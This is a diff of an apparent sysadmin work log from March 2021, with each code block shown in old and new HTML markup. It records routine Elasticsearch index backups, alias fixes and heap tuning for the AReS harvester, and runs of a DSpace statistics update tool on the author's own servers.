- Back up the current `openrxv-items-final` index to start a fresh AReS Harvest:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-final/_clone/openrxv-items-final-2021-03-21
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-final/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><ul>
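<li>The clone itself only takes a moment; listing the indexes (the same check used below) should show the dated backup before starting the harvest:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span></code></pre></div><ul>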
<li>Then start harvesting in the AReS Explorer admin UI</li>
</ul>
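<ul>
<li>Given how often the alias ends up pointing at the wrong index, it is also cheap to check it directly with the <code>_alias</code> API scoped to one name:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/openrxv-items&#39;</span> | python -m json.tool
</span></span></code></pre></div>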
<h2 id="2021-03-22">2021-03-22</h2>
<ul>
<li>The harvesting on AReS yesterday completed, but somehow I have twice the number of items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 206204,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 206204,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>Hmmm and even my backup index has a strange number of items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 844,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final-2021-03-21/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 844,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I deleted all indexes and re-created the openrxv-items alias:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
...
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool | less
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span></code></pre></div><ul>
<li>Then I started a new harvesting</li>
<li>I switched the Node.js in the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure scripts</a> to v12 since v10 will cease to be supported soon
<ul>
@ -591,26 +591,26 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
</li>
<li>The AReS harvest finally finished, with 1047 pages of items, but the <code>openrxv-items-final</code> index is empty and the <code>openrxv-items-temp</code> index has about 103,000 items:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 103162,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 103162,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ul>
<li>I tried to clone the temp index to the final, but got an error:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
{&#34;error&#34;:{&#34;root_cause&#34;:[{&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;}],&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;},&#34;status&#34;:400}%
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>{&#34;error&#34;:{&#34;root_cause&#34;:[{&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;}],&#34;type&#34;:&#34;resource_already_exists_exception&#34;,&#34;reason&#34;:&#34;index [openrxv-items-final/LmxH-rQsTRmTyWex2d8jxw] already exists&#34;,&#34;index_uuid&#34;:&#34;LmxH-rQsTRmTyWex2d8jxw&#34;,&#34;index&#34;:&#34;openrxv-items-final&#34;},&#34;status&#34;:400}%
</span></span></code></pre></div><ul>
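<li>The clone failed because the (empty) <code>openrxv-items-final</code> index already exists, so presumably it has to be deleted first, as in the manual fixes elsewhere:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span></code></pre></div><ul>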
<li>I looked in the Docker logs for Elasticsearch and saw a few memory errors:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">java.lang.OutOfMemoryError: Java heap space
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>java.lang.OutOfMemoryError: Java heap space
</span></span></code></pre></div><ul>
<li>According to <code>/usr/share/elasticsearch/config/jvm.options</code> in the Elasticsearch container the default JVM heap is 1g
<ul>
<li>I see the running Java process has <code>-Xms1g -Xmx1g</code> in its process invocation so I guess that it must indeed be using 1g</li>
@ -622,20 +622,20 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
</ul>
</li>
</ul>
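<ul>
<li>A quick way to confirm the configured heap from the host, assuming the container is named <code>elasticsearch</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker exec elasticsearch grep -E <span style="color:#e6db74">&#39;^-Xm[sx]&#39;</span> /usr/share/elasticsearch/config/jvm.options
</span></span></code></pre></div>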
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"> &#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><h2 id="2021-03-23">2021-03-23</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><h2 id="2021-03-23">2021-03-23</h2>
<ul>
<li>For reference you can also get the Elasticsearch JVM stats from the API:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_nodes/jvm?human&#39;</span> | python -m json.tool
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_nodes/jvm?human&#39;</span> | python -m json.tool
</span></span></code></pre></div><ul>
<li>I re-deployed AReS with 1.5GB of heap using the <code>ES_JAVA_OPTS</code> environment variable
<ul>
<li>It turns out that this <em>is</em> the recommended way to set the heap: <a href="https://www.elastic.co/guide/en/elasticsearch/reference/7.6/jvm-options.html">https://www.elastic.co/guide/en/elasticsearch/reference/7.6/jvm-options.html</a></li>
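<li>For the Docker deployment that amounts to something like <code>ES_JAVA_OPTS=-Xms1536m -Xmx1536m</code> in the environment of the Elasticsearch service (a sketch; the exact compose syntax depends on the stack)</li>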
@ -644,8 +644,8 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
<li>Then I fixed the aliases to make sure <code>openrxv-items</code> was an alias of <code>openrxv-items-final</code>, similar to how I did a few weeks ago</li>
<li>I re-created the temp index:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</code></pre></div><h2 id="2021-03-24">2021-03-24</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span></code></pre></div><h2 id="2021-03-24">2021-03-24</h2>
<ul>
<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=934">ticket about the Duplicate Checker</a>
<ul>
@ -659,105 +659,105 @@ $ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># du -s /home/dspacetest.cgiar.org/solr/statistics
57861236 /home/dspacetest.cgiar.org/solr/statistics
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># du -s /home/dspacetest.cgiar.org/solr/statistics
</span></span><span style="display:flex;"><span>57861236 /home/dspacetest.cgiar.org/solr/statistics
</span></span></code></pre></div><ul>
<li>I applied their changes to <code>config/spring/api/atmire-cua-update.xml</code> and started the duplicate processor:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">1000</span> -c statistics -t <span style="color:#ae81ff">12</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx4096m&#39;</span>
</span></span><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">1000</span> -c statistics -t <span style="color:#ae81ff">12</span>
</span></span></code></pre></div><ul>
<li>The default number of records per query is 10,000, which caused memory issues, so I will try with 1000 (Atmire used 100, but that seems too low!)</li>
<li>Hah, I still got a memory error after only a few minutes:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">...
Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s
Exception: GC overhead limit exceeded
java.lang.OutOfMemoryError: GC overhead limit exceeded
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>Run 1 —  80% — 5,000/6,263 docs — 25s — 6m 31s
</span></span><span style="display:flex;"><span>Exception: GC overhead limit exceeded
</span></span><span style="display:flex;"><span>java.lang.OutOfMemoryError: GC overhead limit exceeded
</span></span></code></pre></div><ul>
<li>I guess we really do have to use <code>-r 100</code></li>
<li>Now the thing runs for a few minutes and &ldquo;finishes&rdquo;:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">100</span> -c statistics -t <span style="color:#ae81ff">12</span>
Loading @mire database changes for module MQM
Changes have been processed
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>*************************
* Update Script Started *
*************************
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Run 1
Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
Done. | Wed Mar 24 14:42:17 CET 2021
Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
Done. | Wed Mar 24 14:42:41 CET 2021
Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
Done. | Wed Mar 24 14:45:46 CET 2021
Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
Done. | Wed Mar 24 14:45:54 CET 2021
Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
Done. | Wed Mar 24 14:45:58 CET 2021
Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
Done. | Wed Mar 24 14:45:59 CET 2021
Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
Run 1 —  52% — 2,500/4,824 docs — 2s — 4m 50s
Run 1 —  54% — 2,600/4,824 docs — 2s — 4m 53s
Run 1 —  56% — 2,700/4,824 docs — 2s — 4m 55s
Run 1 —  58% — 2,800/4,824 docs — 2s — 4m 58s
Run 1 —  60% — 2,900/4,824 docs — 2s — 5m 1s
Run 1 —  62% — 3,000/4,824 docs — 2s — 5m 3s
Run 1 —  64% — 3,100/4,824 docs — 2s — 5m 6s
Run 1 —  66% — 3,200/4,824 docs — 3s — 5m 9s
Run 1 —  68% — 3,300/4,824 docs — 2s — 5m 12s
Run 1 —  70% — 3,400/4,824 docs — 2s — 5m 14s
Run 1 —  73% — 3,500/4,824 docs — 2s — 5m 17s
Run 1 —  75% — 3,600/4,824 docs — 2s — 5m 20s
Run 1 —  77% — 3,700/4,824 docs — 2s — 5m 22s
Run 1 —  79% — 3,800/4,824 docs — 2s — 5m 25s
Run 1 —  81% — 3,900/4,824 docs — 2s — 5m 27s
Run 1 —  83% — 4,000/4,824 docs — 2s — 5m 30s
Run 1 —  85% — 4,100/4,824 docs — 2s — 5m 33s
Run 1 —  87% — 4,200/4,824 docs — 2s — 5m 35s
Run 1 —  89% — 4,300/4,824 docs — 2s — 5m 38s
Run 1 —  91% — 4,400/4,824 docs — 2s — 5m 41s
Run 1 —  93% — 4,500/4,824 docs — 2s — 5m 43s
Run 1 —  95% — 4,600/4,824 docs — 2s — 5m 46s
Run 1 —  97% — 4,700/4,824 docs — 2s — 5m 49s
Run 1 — 100% — 4,800/4,824 docs — 2s — 5m 51s
Run 1 — 100% — 4,824/4,824 docs — 2s — 5m 53s
Run 1 took 5m 53s
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>**************************
* Update Script Finished *
**************************
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ chrt -b <span style="color:#ae81ff">0</span> dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r <span style="color:#ae81ff">100</span> -c statistics -t <span style="color:#ae81ff">12</span>
</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
</span></span><span style="display:flex;"><span>Changes have been processed
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>*************************
</span></span><span style="display:flex;"><span>* Update Script Started *
</span></span><span style="display:flex;"><span>*************************
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Run 1
</span></span><span style="display:flex;"><span>Start updating Solr Storage Reports | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Deleting old storage docs from Solr... | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: eperson | Wed Mar 24 14:42:17 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:42:41 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: group | Wed Mar 24 14:42:41 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:46 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: collection | Wed Mar 24 14:45:46 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:54 CET 2021
</span></span><span style="display:flex;"><span>Processing storage reports for type: community | Wed Mar 24 14:45:54 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:58 CET 2021
</span></span><span style="display:flex;"><span>Committing to Solr... | Wed Mar 24 14:45:58 CET 2021
</span></span><span style="display:flex;"><span>Done. | Wed Mar 24 14:45:59 CET 2021
</span></span><span style="display:flex;"><span>Successfully finished updating Solr Storage Reports | Wed Mar 24 14:45:59 CET 2021
</span></span><span style="display:flex;"><span>Run 1 —   2% — 100/4,824 docs — 3m 47s — 3m 47s
</span></span><span style="display:flex;"><span>Run 1 —   4% — 200/4,824 docs — 2s — 3m 50s
</span></span><span style="display:flex;"><span>Run 1 —   6% — 300/4,824 docs — 2s — 3m 53s
</span></span><span style="display:flex;"><span>Run 1 —   8% — 400/4,824 docs — 2s — 3m 55s
</span></span><span style="display:flex;"><span>Run 1 —  10% — 500/4,824 docs — 2s — 3m 58s
</span></span><span style="display:flex;"><span>Run 1 —  12% — 600/4,824 docs — 2s — 4m 1s
</span></span><span style="display:flex;"><span>Run 1 —  15% — 700/4,824 docs — 2s — 4m 3s
</span></span><span style="display:flex;"><span>Run 1 —  17% — 800/4,824 docs — 2s — 4m 6s
</span></span><span style="display:flex;"><span>Run 1 —  19% — 900/4,824 docs — 2s — 4m 9s
</span></span><span style="display:flex;"><span>Run 1 —  21% — 1,000/4,824 docs — 2s — 4m 11s
</span></span><span style="display:flex;"><span>Run 1 —  23% — 1,100/4,824 docs — 2s — 4m 14s
</span></span><span style="display:flex;"><span>Run 1 —  25% — 1,200/4,824 docs — 2s — 4m 16s
</span></span><span style="display:flex;"><span>Run 1 —  27% — 1,300/4,824 docs — 2s — 4m 19s
</span></span><span style="display:flex;"><span>Run 1 —  29% — 1,400/4,824 docs — 2s — 4m 22s
</span></span><span style="display:flex;"><span>Run 1 —  31% — 1,500/4,824 docs — 2s — 4m 24s
</span></span><span style="display:flex;"><span>Run 1 —  33% — 1,600/4,824 docs — 2s — 4m 27s
</span></span><span style="display:flex;"><span>Run 1 —  35% — 1,700/4,824 docs — 2s — 4m 29s
</span></span><span style="display:flex;"><span>Run 1 —  37% — 1,800/4,824 docs — 2s — 4m 32s
</span></span><span style="display:flex;"><span>Run 1 —  39% — 1,900/4,824 docs — 2s — 4m 35s
</span></span><span style="display:flex;"><span>Run 1 —  41% — 2,000/4,824 docs — 2s — 4m 37s
</span></span><span style="display:flex;"><span>Run 1 —  44% — 2,100/4,824 docs — 2s — 4m 40s
</span></span><span style="display:flex;"><span>Run 1 —  46% — 2,200/4,824 docs — 2s — 4m 42s
</span></span><span style="display:flex;"><span>Run 1 —  48% — 2,300/4,824 docs — 2s — 4m 45s
</span></span><span style="display:flex;"><span>Run 1 —  50% — 2,400/4,824 docs — 2s — 4m 48s
